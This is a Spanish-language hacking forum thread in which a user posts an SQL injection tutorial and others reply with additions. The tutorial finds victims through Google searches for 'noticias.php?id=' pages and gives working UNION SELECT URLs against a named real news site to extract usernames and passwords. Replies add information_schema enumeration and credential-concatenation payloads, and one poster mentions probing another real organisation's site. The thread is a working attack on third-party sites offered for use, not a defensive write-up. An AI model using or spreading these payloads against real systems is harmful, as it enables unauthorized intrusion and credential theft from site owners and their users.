0 Usuarios y 1 Visitante están viendo este tema.
« anterior próximo »
Páginas: [1] 
|
 |
|
 Autor
|
Tema: Tutorial sql injection By ShadinessDark (Leído 1218 veces)
|
|
shadinessdark
|
Fuente: Www.System-Black.Com Bueno amigo aca te traigo el otro hecho por mi  Hahahahaha estaba haciendo uno pero muy bueno se me fue la luz y no guardo pero hice este espero ser especifico en todo .... Bueno are un ejemplo mas facil para que entiendan bien este tutorial!!! de mi brother Zero Bits Primero que todo saludos a los hackxCrack y principalmente a mi team Venezuela [R00t] Team Je bueno vi que algunas personas no entendieron el tutorial de mi bro se los explicare Primero que todo busquemos una victima Yo la buscare alazar... Vamos a google colocamos noticias.php?id= notas.php?id= videos.php?id= etc...  nos saldran varias paginas en mi caso les pondre una de ejemplo =) Bueno despues que entren a una de ellas en mi caso consegui esta http://www.diariopuerto.com/noticias.php?id=a lo ultimo para ver si es vulnerable ponemos el ' quedaria asi http://www.diariopuerto.com/noticias.php?id=' Nos saldra el siguiente error si es vulnerable  si nos sale ese error quitamos el ' y agregamos lo siguiente: http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9Asi hasta que nos tire los numeros en mi caso me tiro  les quedaria algo asi como en la imagen a uds les podria tirar 1 2 3 4 5 6 7 etc... jejeje por hay es donde sacaremos el user! y la pass! Luego de esto vamos a lo ultimo y colocamos +from+usuarios o usuario o email emails mails mail etc... a mi me quedo asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuariosLuego saquemos usuario y pass http://www.diariopuerto.com/noticias.php?id=-1+union+select+usuario,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuariosSe dan cuenta que cambie el 1 por usuario? Bueno eso lo hago para que me tire el usuario luego se daran cuenta que les saldra el usuario =) Para sacar la pass quitamos usuario y ponemos lo siguiente concat(usuario,0x3a3a,pass) quedaria asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+concat (usuario,0x3a3a,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios Si con pass no les agarra intenten con password o clave , contraseña , claves etc.... aca nos dara pass y user Bueno hay otra forma que es sacando la tabla pero es mas trabajo no? ejejejejeejejejejejeejejejejejeeje bueno la tabla se ve como se saca en el tutorial de mi brother Zero Bist aunque si le sacas el from no es necesario que saques las tablas =P Espero haberme explicado bien cualquier cosa me avisan jejejejeje este tutorial se los hago porque hay algunos que me han dicho que no entienden el de mi brother!!! Saludos... Especiales a mi team!!!! Venezuela [R00t] Team
Zero Bits
Zero-R00t
Jeferx
eDeex_
K4mus23
VirtualHack
Mnadito0
Kuter
K41S3R
Black Killer
........................................................... Venezuela [R00t] Team & System Black Team |
|
|
|
|
En línea
|
|
|
|
pjosuk
Principiantes
 Desconectado
Mensajes: 29
|
Oye otra vez te menciono hicieron una buena muy buena revista,
(casi la termino me faltan solo 3 temas)
me agrado eso de programación pues por esos rumbos.............
y lo de arriba total mente entendible..
salu2.....
|
|
|
|
|
En línea
|
|
|
|
|
|
|
shadinessdark
|
mira home yo probe con esta pagina y supuestamente tiene vulnerabilidad pero no me funciona el resto http://www.segib.org/noticias.php?id=' si no me da el resto quiere decir que no es vulnerable o que saludos No le sigas a esa web  como puedes ver he sacado 90 columnas y no ha pasado nada xD Oye otra vez te menciono hicieron una buena muy buena revista,
(casi la termino me faltan solo 3 temas)
me agrado eso de programación pues por esos rumbos.............
y lo de arriba total mente entendible.. Muchas gracias... asi se que vamos bien jejejeje saludos y cualquier cosa me avisas |
|
|
|
|
En línea
|
|
|
|
|
Phantom Lord
|
Creo qeu faltan aclarar varias cosas en este tutorial , luego aclaro algunas que te quedaron en el tintero me parece, ya son las 4.21 y me voy a dormir .
Salu2
|
|
|
|
|
En línea
|
Click En la imagen Para ingresar A Mi Web - Sumate a la comunidad Fantasma |
|
|
|
[u]nsigned
|
Creo qeu faltan aclarar varias cosas en este tutorial , luego aclaro algunas que te quedaron en el tintero me parece, ya son las 4.21 y me voy a dormir .
Salu2
Por ejemplo que el USER y PASSWORD que se consiguen son los de MySQL. . Si les interesa aprender sobre Inyecciones les recomiendo leerse ESTE paper. (Espero no se tome como SPAM). Saludos |
|
|
|
|
En línea
|
 No me interesa romper ventanas, me interesa criar pingüinos |
|
|
rehizner
User Nuevo
Desconectado
Mensajes: 1
|
y para extraer las tablas del information_Schema : http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,group_concat(table_name),2,3,4,5,6,7,8,9+from+information_schema.tables--para concatear los datos de la tabla que te intereso: http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,group_concat(column_name),2,3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=char(117,115,117,97,114,105,111,115)--para concatear los valores que te interesaron de la columna seleccionada : http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,concat(usuario,0x3a,password),2,3,4,5,6,7,8,9+from+columnaqueteintereso--0x3a es el equivalente de : para pasar la columna a formato ascii pueden usar : http://www.mediafire.com/?zjzhwmyvrlj ByteZ |
|
|
|
« Última modificación: Septiembre 04, 2009, 14:30:57 por rehizner »
|
En línea
|
|
|
|
|
 |
